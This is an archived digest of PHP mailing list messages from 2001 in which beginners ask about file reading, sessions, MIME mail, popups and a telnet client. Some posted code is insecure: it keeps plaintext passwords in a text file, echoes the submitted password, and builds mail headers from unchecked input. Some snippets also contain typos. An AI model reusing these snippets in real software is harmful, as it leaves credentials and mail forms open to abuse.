> From: Michael Sims <mhsimsmidsouth.rr.com> > Date: Thu, 20 Dec 2001 22:42:34 -0600 > To: php-generallists.php.net > Subject: Re: [PHP] Re: Mommy, is it true that...? > > At 11:28 PM 12/20/2001 -0500, Billy Harvey wrote: >>> Freshmeat.net is a very popular database of linux software and includes a >>> wide variety of PHP scripts. My point was that if you downloaded an >>> insecure script from such a popular site then you are asking for trouble >>> because chances are thousands of would-be hackers have ALSO downloaded the >>> same script and have familiarized themselves with ways that it can be >>> exploited... >> >> So would you rather just use pre-compiled binaries from some company >> that says "trust me"? > > Sigh. No. The thread has meandered quite a bit, and you'd have to read > the whole thing to see how we got to this point. To summarize: > > Someone made the point that you should always carefully check user > submitted data, and provided an example using an poorly secured fopen() > statement whereby a hacker could gain access to /etc/passwd. I responded > by saying that to do such a thing the hacker would have to know exactly how > your code is written. Someone else responded saying that this was indeed > likely in shared hosting environments or open source software. The above > is me agreeing and saying "oh I didn't think of that" Nowhere did I say > that I think this is a disadvantage of OSS. > > If you wish to extrapolate an argument from what I wrote above then here's > a good one: When you install software that could be a potential security > risk then you should attempt to use well established, peer-reviewed OPEN > SOURCE software and ideally review at the code yourself to make sure it > meets your standards of security and doesn't contain any nasty exploits. > > See, I'm one of the good guys...a dot communist, just like you. ;-) > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net > >

attached mail follows:

HELLO ALL

I have a client who wishes to print the contents of a database to a printer. Does anybody out there know how the command, tables at the click of a button on a content management tool.

------------------------------------------- Mark Webley Multimedia design and development

WebleyCity Limited London United Kingdom

markwebleycity.co.uk mark.webleypsion.net Mobile: 07980 213 627

Fax/Tel: 0208 678 1721 Pager 07654 581816 http://www.webleycity.co.uk -------------------------------------------

> From: Mehmet Kamil ERISEN <erisenyahoo.com> > Date: Thu, 20 Dec 2001 13:59:48 -0800 (PST) > To: php <php-generallists.php.net> > Subject: [PHP] Translate question > > Hello, > I am trying to transalte entry in Turkish Characters to > English Characters. > > I wrote the following code. > > function translate_turkish($string) { > $estring = strtr($string, "?", "c"); > $estring = strtr($string, "?", "c"); > > $estring = strtr($estring, "?", "g"); > $estring = strtr($estring, "G", "G"); > > $estring = strtr($estring, "?", "s"); > $estring = strtr($estring, "S", "S"); > > $estring = strtr($estring, "?", "i"); > $estring = strtr($estring, "I", "XX"); ********* > > > $estring = strtr($estring, "?", "u"); > $estring = strtr($estring, "?", "U"); > > $estring = strtr($estring, "?", "o"); > $estring = strtr($estring, "?", "O"); > > return ($estring) ; > } > > Capital i (not I but it shows at the line where you see the > XX) is causing a problem. I can not translate. from cap i > to I. > > Can you please suggest any help? > > ===== > Mehmet Erisen > http://www.erisen.com > > __________________________________________________ > Do You Yahoo!? > Check out Yahoo! Shopping and Yahoo! Auctions for all of > your unique holiday gifts! Buy at http://shopping.yahoo.com > or bid at http://auctions.yahoo.com > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net > >

attached mail follows:

Does anybody out there know how to embed pdf in a web page

------------------------------------------- Mark Webley Multimedia design and development

WebleyCity Limited London United Kingdom

markwebleycity.co.uk mark.webleypsion.net Mobile: 07980 213 627

Fax/Tel: 0208 678 1721 Pager 07654 581816 http://www.webleycity.co.uk -------------------------------------------

> From: "Lancashire, Pete" <PLancashirecolumbia.com> > Date: Thu, 20 Dec 2001 09:28:58 -0800 > To: <php-generallists.php.net> > Subject: [PHP] rrd tool's graphing and png > > I must be doing something wrong that is really simple > hence I can't figure out what I'm doing wrong. > > I'm using a package called rrd tool, one of its (unix) > command line programs has the option to output to stdout > a png image. > > I'm trying to get that output feed in to ImagePNG to > display the image within an HTML page. > > the png lib is running ok, tested by one of the examples > from the Image function doc's. > > Any suggestions ... > > Thanks > > -pete > > Pete Lancashire > Unix Systems Administration > Columbia Sportswear Co. Inc. > PLancashireColumbia.com > (503) 985-4173 > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net > >

attached mail follows:

Hello all!

I've wrote to scripts that use Javascript too. The idea is to have a parent window teste_popup.php4 and a child window pop.php4. When a link is clicked on the parent window, the child window will open. After the user enters information on the child window he must close it and that will update the parent window.possibility to me.

But there's a little problem,though.

The only browser that it works is MS IE. It does not work on Nestcape (Win or *NIX) or Konqueror (*NIX).

If I try it on a different browser, say Netscape or Konqueror, when I click the main window to open the popup window it does work. The thing that does not work is when you click close on the popup window. It does not close the popup window and if I close the window it does not update the parent window.

I've written two test PHP scripts teste_popup.php4 (the main window) and pop.php4 that I am including below. Maybe someone can help me out by pointing where it is wrong.

teste_popup.php4 (parent window script)

<?php // teste_popup.php4 print("<html>\n"); print("<head>\n"); //print("<script type=\"text/javascript\">\n"); print("<script language=\"JavaScript\"></script>\n"); print("</head>\n"); print("<body>\n"); print("<p>\n"); print("Esse e um teste usando Javascript para montar as janelas\n"); print("a parte de numero de operacoes, pecas, etc de garantia.\n"); print("</p>\n"); print("<b>\n"); print("Data : ".date(d."/".m."/".Y." ".H.":".i.":".s)."\n"); print("<b>\n"); print("<br>\n"); print("<br>\n"); print("<a href=\"JavaScript:newWin('pop.php4?oper=1');\">link</a>\n"); print("<br>\n"); print("</body>\n"); print("</html>\n"); ?>

pop.php4 - child popup window

<?php // pop.php4

print("<html>\n"); print("<head>\n"); //print("<script type=\"text/javascript\">\n"); print("<script language=\"JavaScript\"></script>\n"); print("</head>\n"); print("<body onunload=\"JavaScript:oldWin('teste_popup.php4?oper=1')\">\n"); print("<b>\n"); print("Child window\n"); print("</b>\n"); print("<br>\n"); print("Parametro oper = ".$HTTP_GET_VARS["oper"]."\n"); print("<br>\n"); print("<a href=\"JavaScript:oldWin('teste_popup.php4?oper=1')\">Close e Update</a>\n"); print("<br>\n"); print("</body>\n"); print("</html>\n");

Could anyone help me out to adapt it to any browser?

Thank you very much and merry christmas,

Carlos Fernando Scheidecker Antunes. Salt Lake City, Utah - USA.

attached mail follows:

I haven't tried your code, but I'm thinking what's happening is that the browsers that the code isn't working in is stopping at the "returnwin=window.opener.navigate(urlLoc);" line - what happens if you change it to "returnwin=window.opener.location = urlLoc;" ??

----Original Message----- From: Carlos Fernando Scheidecker Antunes [mailto:nandoantunes.eti.br] Sent: Friday, December 21, 2001 3:02 PM To: PHP-GENERAL Subject: [PHP] Multiple JavaScript Windows with PHP Importance: High

Hello all!

But there's a little problem,though.

The only browser that it works is MS IE. It does not work on Nestcape (Win or *NIX) or Konqueror (*NIX).

I've written two test PHP scripts teste_popup.php4 (the main window) and pop.php4 that I am including below. Maybe someone can help me out by pointing where it is wrong.

teste_popup.php4 (parent window script)

pop.php4 - child popup window

<?php // pop.php4

Could anyone help me out to adapt it to any browser?

Thank you very much and merry christmas,

Carlos Fernando Scheidecker Antunes. Salt Lake City, Utah - USA.

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

It still the same thing. It child does not close on Nestcape and Konqueror and when it closes on IE now it refreshes teh parent window twice.

----- Original Message ----- From: "Martin Towell" <martin.towellworld.net> To: "'Carlos Fernando Scheidecker Antunes'" <nandoantunes.eti.br>; "PHP-GENERAL" <PHP-GENERALlists.php.net> Sent: Thursday, December 20, 2001 11:12 PM Subject: RE: [PHP] Multiple JavaScript Windows with PHP

Hello all!

But there's a little problem,though.

The only browser that it works is MS IE. It does not work on Nestcape (Win or *NIX) or Konqueror (*NIX).

I've written two test PHP scripts teste_popup.php4 (the main window) and pop.php4 that I am including below. Maybe someone can help me out by pointing where it is wrong.

teste_popup.php4 (parent window script)

pop.php4 - child popup window

<?php // pop.php4

Could anyone help me out to adapt it to any browser?

Thank you very much and merry christmas,

Carlos Fernando Scheidecker Antunes. Salt Lake City, Utah - USA.

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

This seems newbie. So what am I doing wrong? I want to print the contents of the file. I get resource id #1 instead. Do I need to add a header or what?

<?php

//$fp = fopen ("C:/Program Files/localhost/info.txt", "r"); //$fp = fopen ("http://compcanlit.ca/", "r"); $fp = fopen ("./info.txt", "r");

print $fp;

fclose($fp);

attached mail follows:

<?php

//$fp = fopen ("C:/Program Files/localhost/info.txt", "r"); //$fp = fopen ("http://compcanlit.ca/", "r"); $fp = fopen ("./info.txt", "r");

while (!foef($fp)) { $line = fgets($fp, 1024); echo $line; }

fclose($fp); ?>

what you were doing was opening a file ready for reading and then printing the pointer to the file, and not the file itself...

-----Original Message----- From: jtjohnston [mailto:jtjohnstoncourrier.usherb.ca] Sent: Friday, December 21, 2001 4:13 PM To: php-generallists.php.net Subject: [PHP] Beginner question?

This seems newbie. So what am I doing wrong? I want to print the contents of the file. I get resource id #1 instead. Do I need to add a header or what?

<?php

//$fp = fopen ("C:/Program Files/localhost/info.txt", "r"); //$fp = fopen ("http://compcanlit.ca/", "r"); $fp = fopen ("./info.txt", "r");

print $fp;

fclose($fp);

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

At 12:13 AM 12/21/2001 -0500, jtjohnston wrote: >This seems newbie. So what am I doing wrong? I want to print the >contents of the file. I get resource id #1 instead. Do I need to add a >header or what? > ><?php > >//$fp = fopen ("C:/Program Files/localhost/info.txt", "r"); >//$fp = fopen ("http://compcanlit.ca/", "r"); >$fp = fopen ("./info.txt", "r"); > >print $fp; > >fclose($fp); > >?>

$fp is just a file pointer, not the actual contents of the file. You need to use fgets() (or something similar) to actually get the contents out.

http://www.php.net/manual/en/function.fgets.php

attached mail follows:

Michael,

$fp = fopen ("./users.txt", "r"); while (!feof ($fp)) { $buffer = fgets($fp, 4096); echo $buffer; } fclose($fp);

Ok. But $buffer is not an array, is it? Why/what is 4096? What is !feof ?

Can anyone show me how to split() each line and parse to see if $user exists?

Here's what I'm upto. I want to use users.txt as a user:password text database file. I want to read users.txt into an array. I want to parse each line splitting for ":"

user:pass john:help michael:thanks

$fp = fopen ("./users.txt", "r"); while (!feof ($fp)) { $buffer = fgets($fp, 4096); echo $buffer; } fclose($fp);

$user = "john"; $num_fields = count($buffer); for ($i = 0; $i < $num_fields; $i++) { if ?? = $user then echo ?? }

Can anyone show me how to split() each line and parse to see if $user exists?

> ><?php > >$fp = fopen ("./info.txt", "r"); > >print $fp; > >fclose($fp); > >?>

> $fp is just a file pointer, not the actual contents of the file. You need > to use fgets() (or something similar) to actually get the contents out. > http://www.php.net/manual/en/function.fgets.php

attached mail follows:

:) Again why 1024? or 4096 or ... ?

> while (!foef($fp)) > { > $line = fgets($fp, 1024); > echo $line; > }

attached mail follows:

I would love to see a decent debugger like perl has. Nothing is more frustrating then having to echo and die() to debug code. Especially when you are assigned the task of updating code from a developer that has long gone without leaving any documentation.

Stephano Mariani wrote:

> Hi! > > I have been a PHP user since version 3.0 came out, and have seen it > develop a lot along the way, but theres some things I find it lacks that > it really should not. If people agree, I'll glady contribute to the PHP > codebase. > > For example, multi-threading. Looking at the PHP sources, I can see this > would be fairly easy to implement on some most server modules. Before I > get fried by people for suggesting this, I know there are many functions > that are not thread safe, such the ob_* functions. But as far as I can > see threading would be well suited to some PHP tasks... > > I'd like to hear users thoughts on this. > > TIA, > > Stephano Mariani > > > >

-- 
Vincent Stoessel vincentxaymaca.com
Java Linux Apache Mysql Php (JLAMP) Engineer
(301) 362-1750 Mobile (410) 419-8588
AIM, MSN: xaymaca2020 , Yahoo Messenger: vks_jamaica

attached mail follows:

Hello,

Vincent Stoessel wrote: > > I would love to see a decent debugger like perl has. > Nothing is more frustrating then having to echo and die() > to debug code. Especially when you are assigned the task of > updating code from a developer that has long gone without > leaving any documentation.

PHP has a built-in debugger support. You can single-step, put break-points, watch variables, etc... from many several existing debugger GUI .

> > I have been a PHP user since version 3.0 came out, and have seen it > > develop a lot along the way, but theres some things I find it lacks that > > it really should not. If people agree, I'll glady contribute to the PHP > > codebase. > > > > For example, multi-threading. Looking at the PHP sources, I can see this > > would be fairly easy to implement on some most server modules. Before I > > get fried by people for suggesting this, I know there are many functions > > that are not thread safe, such the ob_* functions. But as far as I can > > see threading would be well suited to some PHP tasks...

You can use the pcntl extension if you are using any (fork capable) Unix.

Regards, Manuel Lemos

attached mail follows:

I did not know that, thank you for the info. I just downloaded phpIDE beta and I am highly impressed with the debugger. It say that it can do remote debugging as well. That sounds cool but I wonder how secure it is. Zend folks, I apologize for taking so long to try out this product, it's great!

Manuel Lemos wrote:

> Hello, > > Vincent Stoessel wrote: > >>I would love to see a decent debugger like perl has. >>Nothing is more frustrating then having to echo and die() >>to debug code. Especially when you are assigned the task of >>updating code from a developer that has long gone without >>leaving any documentation. >> > > PHP has a built-in debugger support. You can single-step, put > break-points, watch variables, etc... from many several existing > debugger GUI . > > > >>>I have been a PHP user since version 3.0 came out, and have seen it >>>develop a lot along the way, but theres some things I find it lacks that >>>it really should not. If people agree, I'll glady contribute to the PHP >>>codebase. >>> >>>For example, multi-threading. Looking at the PHP sources, I can see this >>>would be fairly easy to implement on some most server modules. Before I >>>get fried by people for suggesting this, I know there are many functions >>>that are not thread safe, such the ob_* functions. But as far as I can >>>see threading would be well suited to some PHP tasks... >>> > > You can use the pcntl extension if you are using any (fork capable) > Unix. > > Regards, > Manuel Lemos > >

-- 
Vincent Stoessel vincentxaymaca.com
Java Linux Apache Mysql Php (JLAMP) Engineer
(301) 362-1750 Mobile (410) 419-8588
AIM, MSN: xaymaca2020 , Yahoo Messenger: vks_jamaica

attached mail follows:

Hi pals, Thanks a lot for all the PHP pals , I have recoded my script an' now itz working fine.

cheers an' regards, - JFK kishor Nilgiri Networks

attached mail follows:

On 20 Dec 2001, at 17:34, Alex Shi wrote:

> If a sesson_id is known, how can check if the session exists?

I think this answers the question (function.session-id.html)

> session_id > (PHP 4 >= 4.0.0) > session_id -- Get and/or set the current session id > Description > string session_id ([string id]) > session_id() returns the session id for the > current session. If id is specified, it > will replace the current session id. > > The constant SID can also be used to > retrieve the current name and session id as a string suitable for > adding to URLs.

Peter

--------------------------- "Reality is that which, when you stop believing in it, doesn't go away". -- Philip K. Dick

attached mail follows:

Hi,

Can someone tell me if there is something wrong with the order of the mail function in here.

I am trying to get the text in HTML format, but I am not getting the text in html format.

else { $mailheaders = "From: $email\r\n"; $mailheaders .= "Reply-To: $email\r\n"; $mailheaders .= "Content-Type: text/html; charset=iso-8859-1\r\n"; $remarks .= "<br><br>$items"; mail("yungpnetvigator.com", "quotation enquiry", $remarks, $mailheaders); header("Location: http://www.winwhole.com.hk/sent.php");} };

Thanks.

Peter

attached mail follows:

If you declare

Here is code that works:

<?php session_name("ESLpostcard"); session_start();

$img_encoded = base64_encode($image_data);

mail($theiremail, "You Have A Christmas Postcard", "", "from: \"$yourname\" <$youremail>\r\n" ."Content-Type: multipart/mixed; boundary=\"------------15E3B1D587950C2CAADCBF93\"

This is a multi-part message in MIME format. --------------15E3B1D587950C2CAADCBF93 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit

$yourmessage

--------------15E3B1D587950C2CAADCBF93 Content-Type: image/png; name=\"postcard10.png\" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename=\"postcard10.png\"

$img_encoded --------------15E3B1D587950C2CAADCBF93--

");

attached mail follows:

If you declare a header after you used html or echoed something, it will fail.

header("Location: http://www.winwhole.com.hk/sent.php")

HTH. Here is some code that works:

<?php session_name("ESLpostcard"); session_start();

$img_encoded = base64_encode($image_data);

mail($theiremail, "You Have A Christmas Postcard", "", "from: \"$yourname\" <$youremail>\r\n" ."Content-Type: multipart/mixed; boundary=\"------------15E3B1D587950C2CAADCBF93\"

This is a multi-part message in MIME format. --------------15E3B1D587950C2CAADCBF93 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit

$yourmessage

--------------15E3B1D587950C2CAADCBF93 Content-Type: image/png; name=\"postcard10.png\" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename=\"postcard10.png\"

$img_encoded --------------15E3B1D587950C2CAADCBF93--

");

attached mail follows:

Sorry but I am a bit of a newbie at this.

So do you mean that I am supposed write it like this?

else { $mailheaders = "From: $email\r\n"; $mailheaders .= "Reply-To: $email\r\n"; $mailheaders .= "Content-Type: text/html; charset=iso-8859-1\r\n"; $remarks .= "<br><br>$items"; mail("yungpnetvigator.com", "quotation enquiry", $remarks, "from: \"$yourname\" <$youremail>\r\n" "Content-Type: multipart/mixed; boundary=\"------------15E3B1D587950C2CAADCBF93\"

This is a multi-part message in MIME format. --------------15E3B1D587950C2CAADCBF93 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit); header("Location: http://www.winwhole.com.hk/sent.php");} };

On Fri, 21 Dec 2001, jtjohnston wrote:

> If you declare a header after you used html or echoed something, it will fail. > > header("Location: http://www.winwhole.com.hk/sent.php") > > HTH. > Here is some code that works: > > <?php > session_name("ESLpostcard"); > session_start(); > > $img_encoded = base64_encode($image_data); > > mail($theiremail, "You Have A Christmas Postcard", "", "from: \"$yourname\" > <$youremail>\r\n" > ."Content-Type: multipart/mixed; > boundary=\"------------15E3B1D587950C2CAADCBF93\" > > This is a multi-part message in MIME format. > --------------15E3B1D587950C2CAADCBF93 > Content-Type: text/plain; charset=us-ascii > Content-Transfer-Encoding: 7bit > > $yourmessage > > --------------15E3B1D587950C2CAADCBF93 > Content-Type: image/png; > name=\"postcard10.png\" > Content-Transfer-Encoding: base64 > Content-Disposition: inline; > filename=\"postcard10.png\" > > $img_encoded > --------------15E3B1D587950C2CAADCBF93-- > > "); > > ?> > > > > > >

attached mail follows:

I'm trying to figure out how to parse an xml document, and convert it into html... i know how to parse in simple xml stuff for example <easy>easy</easy> is pretty easy to parse in, and i know how to code that, but when you start adding flags that i'm going to need variables for, example <easy does="1" it="2">easy</easy> is not so easy.

*** paste sample xml *** <report gmt_date="1206082001" unix_date="992001907.000000">

attached mail follows:

Maybe you should take a look at XSL

http://www.w3schools.com/xsl/ http://www.w3.org/Style/XSL/

-----Original Message----- From: php dood [mailto:bryanintegrityol.com] Sent: Friday, December 21, 2001 2:04 AM To: php-generallists.php.net Subject: [PHP] arrays

*** paste sample xml *** <report gmt_date="1206082001" unix_date="992001907.000000">

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

The information contained in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any form of disclosure, production, distribution or any action taken or refrained from in reliance on it, is prohibited and may be unlawful. Please notify the sender immediately.

The content of the email is not legally binding unless confirmed by letter bearing two authorized signatures.

attached mail follows:

the attached file implements a minimal telnet client and is free to use.

re, tc

On Wed, Dec 19, 2001 at 02:16:36PM -0800, Chris Lee wrote: > if I nc to my server on port 23 I get the same thing. ie there is nothing > wrong. your going to have to emulate the telnet protocal now, thats just the > connect string. > > -- > > Chris Lee > leemediawaveonline.com > > > > > "Kancha" <kancha2npyahoo.com> wrote in message > news:php.general-78200news.php.net... > > The following code generated garbase output. what is wrong ?? > > > > <?php > > $sp = fsockopen("localhost", 23); > > if(!$sp){ > > echo "error"; > > exit; > > } > > socket_set_blocking($sp, FALSE); > > > > function getLine(){ > > global $sp; > > > > $op = fgets($sp, 1024); > > while(empty($op)){ > > $op = fgets($sp, 1024); > > } > > return $op; > > } > > > > echo getLine(); > > ?> > > > > The output was as follows: > > > > [rootispms html]# php telnet.php > > X-Powered-By: PHP/4.1.0 > > Content-type: text/html > > > > ÿý?ÿý ÿý#ÿý'[rootispms html]# > > > > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net >

text/plain attachment: telnet.php

attached mail follows:

Hello all!

But there's a little problem,though.

The only browser that it works is MS IE. It does not work on Nestcape (Win or *NIX) or Konqueror (*NIX).

I've written two test PHP scripts teste_popup.php4 (the main window) and pop.php4 that I am including below. Maybe someone can help me out by pointing where it is wrong.

teste_popup.php4 (parent window script)

pop.php4 - child popup window

<?php // pop.php4

Could anyone help me out to adapt it to any browser?

Thank you very much and merry christmas,

Carlos Fernando Scheidecker Antunes. Salt Lake City, Utah - USA.

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

Can it be improved upon? Suggestions welcome, John

<?php

$fp = fopen ("./users.pass", "r");

while (!feof ($fp)) { $line = fgets($fp, 4096); list($user,$password) = explode(":", $line); $password = chop($password);

if(!isset($PHP_AUTH_USER)) { authenticate(); } elseif(($PHP_AUTH_USER != $user) || ($PHP_AUTH_PW != $password)) { authenticate(); }else{ echo "<p>Welcome: $PHP_AUTH_USER</p>"; echo "<p>Password: $PHP_AUTH_PW</p>"; exit; } } fclose($fp);

function authenticate() { global $PHP_AUTH_USER, $PHP_AUTH_PW; header( "WWW-Authenticate: Basic realm=\"Students\""); header( "HTTP/1.0 401 Unauthorized"); echo "$PHP_AUTH_USER, you must enter a valid login ID and password to access this resource. \"$PHP_AUTH_PW\" is not a valid password!\n"; exit; }

attached mail follows:

my logout.php looks like this

<code> session_start(); session_register("SESSION"); //these 2 things have to be on every page right? require ('validate_session.php'); //does compare $PHPSESSID and the sessid i have in every url

// start of validate_session.php <? header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache");

if($id != $PHPSESSID) { session_destroy(); setcookie ("cookie", "", time() - 32436000); echo"<SCRIPT LANGUAGE=\"JavaScript\"></script>"; exit; } ?> // end of validate_session.php

session_destroy(); session_unregister("SESSION"); session_unset("SESSION"); session_write_close(); </code>

but the session wont leave. i can browse to other sides, but i can comeback later, and i get the same session id...

what is wrong?

attached mail follows:

I'm trying to create a function that will generate output that could go to either a file or to the current browser directly. To do this I have something like:

function GenerateOutput($out) { fwrite($out, "Some stuff"); fflush($out); }

and to call it I tried:

$stdout = fopen("php://stdout", "w"); GenerateOutput($stdout);

But for some reason nothing shows in the browser when I do this.

I can't seem to find information about what output stream "printf" is actually writing to. Do we have access to this stream?

Can anyone provide a hint as to why the above doesn't work?

Thanks. _________________________________________________________________________ Paul H. Breslin http://Canadian-Artist.com mailto:phbCanadian-Artist.com

attached mail follows:

As far as I'm aware PHP does output to stdout. Whether or not we can actually access that stream is another question, and one I don't know the answer to.

However, I do have a suggestion... Have you looked at the output buffering functions? They seem to implement what you're trying to do...

http://www.php.net/manual/en/ref.outcontrol.php

HTH,

Richy

-----Original Message----- From: Paul H. Breslin [SMTP:phbCanadian-Artist.com] Sent: 21 December 2001 07:40 To: php-generallists.php.net Subject: [PHP] Standard output (printf) question...

I'm trying to create a function that will generate output that could go to either a file or to the current browser directly. To do this I have something like:

function GenerateOutput($out) { fwrite($out, "Some stuff"); fflush($out); }

and to call it I tried:

$stdout = fopen("php://stdout", "w"); GenerateOutput($stdout);

But for some reason nothing shows in the browser when I do this.

I can't seem to find information about what output stream "printf" is actually writing to. Do we have access to this stream?

Can anyone provide a hint as to why the above doesn't work?

Thanks. _________________________________________________________________________ Paul H. Breslin http://Canadian-Artist.com mailto:phbCanadian-Artist.com

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

Thanks Richard,

I don't think the output buffering does what I want. I want to be able to do something like this:

if( $preview_mode ) $output = fopen("php://stdout", "w"); else $output = fopen("/some/file/path/soemwhere.html", "w"); GenerateOutput($output);

hmmm.... wait, maybe you're right. I guess I could grab the contents of the output buffer and write it to the file instead of to stdout. Kind of an indirect way of doing it. Not like C/C++.

Thanks for the pointer. Richard Black wrote: > > As far as I'm aware PHP does output to stdout. Whether or not we can > actually access that stream is another question, and one I don't know the > answer to. > > However, I do have a suggestion... Have you looked at the output buffering > functions? They seem to implement what you're trying to do... > > http://www.php.net/manual/en/ref.outcontrol.php > > HTH, > > Richy > > -----Original Message----- > From: Paul H. Breslin [SMTP:phbCanadian-Artist.com] > Sent: 21 December 2001 07:40 > To: php-generallists.php.net > Subject: [PHP] Standard output (printf) question... > > I'm trying to create a function that will generate output that could go to > either a file or to the current browser directly. To do this I have > something > like: > > function GenerateOutput($out) > { > fwrite($out, "Some stuff"); > fflush($out); > } > > and to call it I tried: > > $stdout = fopen("php://stdout", "w"); > GenerateOutput($stdout); > > But for some reason nothing shows in the browser when I do this. > > I can't seem to find information about what output stream "printf" is > actually > writing to. Do we have access to this stream? > > Can anyone provide a hint as to why the above doesn't work? > > Thanks. _________________________________________________________________________ Paul H. Breslin http://Canadian-Artist.com mailto:phbCanadian-Artist.com

attached mail follows:

Dear all I had designed a Index.php, this page is made of different Frames by using UltraDev.The Frame included are Top, Left and Main. In my Left Frame which i used left.php, i had use JavaScript to make a Menu. Top Frame is a Banner and Main is just some content. When i browse preview it, the page just go Perfect! Then Later on. I had a Login.php page which will let user login before they can access my Internal Website. In my Login.php Page, the user will type in the Username and Password, and i had set to post these two var to Index.php. and in Index.php just before the <html> tag, i add a scrpt: <? requrie ("check.php")?> This Check.php is actually the script which will verify the Username and Password passed from Login.php. Once <? requrie ("check.php")?> and add into Index.html, then there is nothing shows up, not even frames, menu or any Banner!! Could someone pls help me with this!! I'm Stuck!!!

Thx a lot!! Jack jacknedcor.com

attached mail follows:

Hey guys,

I know this has been brought up several times but can't find it in the archives of this list.

I have some PHP 4 scripts that check the value of a "logged in" variable. if the user authenticates him/her self, then the "logged in" variable gets set and regist